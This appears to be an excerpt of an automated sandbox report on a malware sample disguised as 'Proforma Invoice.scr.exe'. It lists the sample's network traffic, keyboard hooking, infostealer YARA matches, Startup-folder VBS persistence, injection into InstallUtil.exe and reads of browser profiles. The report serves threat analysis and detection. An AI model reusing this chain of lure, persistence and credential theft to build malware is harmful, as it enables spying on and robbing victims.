                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                      Source: unknownHTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49879 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49910 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:51774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51776 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Proforma Invoice.scr.exe
                      Sample has a suspicious name (potential lure to open the executable)
                      Source: Proforma Invoice.scr.exeStatic file information: Suspicious name
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D36EE0 NtResumeThread,6_2_05D36EE0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D35EA8 NtProtectVirtualMemory,6_2_05D35EA8
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D36ED8 NtResumeThread,6_2_05D36ED8
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D35EA0 NtProtectVirtualMemory,6_2_05D35EA0
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_05A008A00_2_05A008A0
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_05A02A880_2_05A02A88
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_059B6E5B0_2_059B6E5B
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_008EE6300_2_008EE630
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_008ECEA00_2_008ECEA0
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_008E90D10_2_008E90D1
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_008E90E00_2_008E90E0
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_008E96F90_2_008E96F9
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_06DDE2F00_2_06DDE2F0
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_06DC00400_2_06DC0040
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_06DC003A0_2_06DC003A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B741783_2_00B74178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B7E2053_2_00B7E205
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B7AA133_2_00B7AA13
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B74A483_2_00B74A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B73E303_2_00B73E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E691E73_2_05E691E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E645B03_2_05E645B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E635603_2_05E63560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E65D403_2_05E65D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E6A1483_2_05E6A148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E610203_2_05E61020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E6E2823_2_05E6E282
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E63C9B3_2_05E63C9B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E6C3603_2_05E6C360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E602F93_2_05E602F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05E656603_2_05E65660
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_0123E6306_2_0123E630
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_0123CEA06_2_0123CEA0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_012390E06_2_012390E0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_012390D16_2_012390D1
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_012396F96_2_012396F9
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D215B86_2_05D215B8
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D26C596_2_05D26C59
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D26C686_2_05D26C68
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D216D06_2_05D216D0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D212256_2_05D21225
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D323A06_2_05D323A0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D317086_2_05D31708
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D316F86_2_05D316F8
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_05D3B9696_2_05D3B969
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_0739E2F06_2_0739E2F0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_073800076_2_07380007
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_073800406_2_07380040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F741787_2_00F74178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F74A487_2_00F74A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F7AA137_2_00F7AA13
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F7DBD87_2_00F7DBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F73E307_2_00F73E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C35607_2_062C3560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C5D407_2_062C5D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C45B07_2_062C45B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062CE3E57_2_062CE3E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C10207_2_062C1020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062CA1487_2_062CA148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C91E77_2_062C91E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C56607_2_062C5660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C3C9B7_2_062C3C9B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062C02F97_2_062C02F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_062CC3607_2_062CC360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F7E46B7_2_00F7E46B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F7DF897_2_00F7DF89
                      Source: Proforma Invoice.scr.exeBinary or memory string: OriginalFilename vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename733a6bb5-19fe-4822-8fda-5eaf140f8bd0.exe4 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000000.2255212878.0000000000284000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAvhywekp.exe2 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAvhywekp.exe2 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000025BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2453582503.00000000008FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2479169226.0000000006110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEpjjhbuhzzx.dll" vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEpjjhbuhzzx.dll" vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename733a6bb5-19fe-4822-8fda-5eaf140f8bd0.exe4 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003758000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEpjjhbuhzzx.dll" vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exeBinary or memory string: OriginalFilenameAvhywekp.exe2 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Proforma Invoice.scr.exe, Aqzdppc.csCryptographic APIs: 'CreateDecryptor'
                      Source: EncoderFallback.exe.0.dr, Aqzdppc.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/3
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs"
                      Source: Proforma Invoice.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Proforma Invoice.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Proforma Invoice.scr.exeReversingLabs: Detection: 60%
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeFile read: C:\Users\user\Desktop\Proforma Invoice.scr.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice.scr.exe "C:\Users\user\Desktop\Proforma Invoice.scr.exe"
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\EncoderFallback.exe "C:\Users\user\AppData\Roaming\EncoderFallback.exe"
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\EncoderFallback.exe "C:\Users\user\AppData\Roaming\EncoderFallback.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
